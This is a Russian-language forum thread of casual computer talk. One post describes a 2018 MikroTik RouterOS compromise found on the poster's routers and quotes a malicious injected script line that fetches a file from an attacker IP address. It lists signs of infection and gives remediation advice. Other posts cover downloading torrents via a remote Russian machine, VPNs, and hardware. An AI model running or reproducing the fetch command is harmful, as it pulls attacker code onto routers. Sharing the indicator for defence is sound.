ТЕМА: Общая тема на поболтать о компах с пользой

Ну фих знает. У меня таких залетов не было.

Какая разница, вся эта мелкая шелупень читается мгновенно.

Я стараюсь на виндах одним локальным диском жить, чувствительное синхронизируется с файлопомойкой, а совсем важное еще и с чужим облаком. Тут два момента: не потеряешь, ну и на всех моих компах есть рабочие файлы и играет одинаковая музыка (и на телефоне). Лучше бекапится, чем дрожать. Ну и замена ОС/компа происходит без траблов.

Уязвимости MikroTik
К сожалению скриншотов не будет. Будет сухой текст.

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.

Причем уязвимость позволяет узнать логин и пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.

Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.

Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов.

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.



Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.

А если просто сбросить на заводские настройки физической кнопкой reset?

Леша, это хрень полная: должен быть открыт наружу порт для ВинБокса, что бы пустить заразу. Не для определенных ай-пи, не для доверенных сетей, а тупо для всех. Не, это нехорошо, получилось, но каким отбитым должен быть админ, что бы администрировать снаружи с любого места?
(голосом либерала-белогандонника)Как известно всем, удаленное управление маршрутами и правами доступа - к дальней дороге.

Я не знаю. Для вас, как для любителей Микротика, скопипастил

Вот вопрос!


Есть комп на территории РФ, со статическим IP, с доступом через RDP.

Есть человек, проживающий в ФРГ, где злобно дрючат за просто даже хождение на торрент-сервера, типа Рутрекера.


А вот используя RDP, качать на комп в РФ программки и потом простым копированием копировать его на комп в Гермашке - это как то покарается?
Отследится роль удаленного компа и а-я-яйный контент как то?

Леша, все проще: ходить на трекер через ХТТПС, качать только с шифрованием. И никто никого не вздрючит.

Если хочется извращений, то: в России ставим Трансмишн, а управляем оным из Германии. Забираем через ФТПС.

В твоей схеме копирование нешифрованного контента = залет.

На РФ стороне поднять FTP сервер и фсьо?

Я туповат - разложи по полочкам плз

Ulis писал(а):На россиской стороне:
1. Консольный торрент клиент Transmision. Им можно управлять удалённо, а можно просто закидывать торрент файлы в директорию и он их будет подхватывать.
2.Наладить какой то транспорт к клиенту, может просто подключить как сетевой диск, если канал позволяет, и смотреть прямо с диска в России. Или наладить тоннель. Или поднять ftpS. Последняя буква о том, что контент передается зашифрованным. Не знаю как сделать точно, но как то сделать.
Дрочиво с 3даленным рабочим столом - кака.

Спасиб. Подумаем ))

Купить VPN и через него все делать никак? Или проксю купить
nordvpn.com/ru/...ocks5/utorrent/

Хотелось бы халявы ))

Если халява, то поднимаешь на своем компе socks проксю, раздаешь доступ страждущим... и ждать гостей из фсб
Если без приколов, то насколько сие действие тянет и какие законы нарушает лучше у юристов спросить, я не интересовался за ненадобностью.

Да, понятно.

Как то вас там запугали страшно. Я все с шифрованием качаю, правда у меня оно на месте не сохраняется - посмотрел и и само стерлось.

Я вот читаю форумы фашистские на эту тему. Говорят, что качать не возбраняется, а вот раздавать низзя абсолютно.
Но пока читаю. Может и сам закон почитать ))

А вот такой вопрос: хочу купить новый комп, но так, чтобы Вин7 поддерживалась, можно было у кетайсев купить зион, а ещё что бы грузился с PCI или М2. Какой мазер купить? Может кто-то уже решал данный квест.

Блок питания рутера словил на2.71бня. Ну дома то ничего похожего нету, хнык! Почесал во лбу и приделал.... батарейку от шуруповерта. Интересно, на сколько хватит.

Блина, я очень хочу такую штуку! Отговорите, а! Дорого, блин, жалко денег, отговорите!

www.3dconnexion...se_wireless/eu/

GREY писал(а):Я получил Q6600 - ну реально быстрее все поехало! Не, всякое простенькое и так нормально было, а вот какой СолидВоркс подкусывался. Теперь отлично! Нифига обновляться не буду, не стоит тот прирост тех денег.
Сначала я поменял видяшку с простой на Квадру, удивился. Потом ССД поставил, больше удивился. Теперь процессор поменял - совсем не удивился, был готов. Теперь вроде всего хватает.

Заказал еще один Q6600 - дома поставлю.

GREY писал(а):
И зачем эта штука?

Ulis писал(а):В СолидВорксе модель крутить.

Эмммммм....))))

А при зажатой третьей кнопке модель как то не так крутится? )))

Ненене! Посмотри видео какое на ютупе. Ты вот как эту штуку тискаешь, так модель двигается. По всем осям наклон/движение. Посмотри, ты охренеешь.
Меня кетайтсы вообще разочаровали, уже пора сделать втрое дешевле, а они все тормозят. Уже нету сил ждать. До марта дожду, куплю себе на др, если другой подарок не придумаю.
Пипец, как я хочу!

У родственницы рабочий ноут перестал видеть сеть.
Я его два часа крутил на предмет программных траблов.

В итоге решил таки раскрутить.
И что? А вот бл..., китайцы не прикрутили единственный винт, которым Wi-fi модуль держит в разъеме и тот благополучно вывалися из него.

Ненависть!


HP 17-bs054ng модель.

У меня все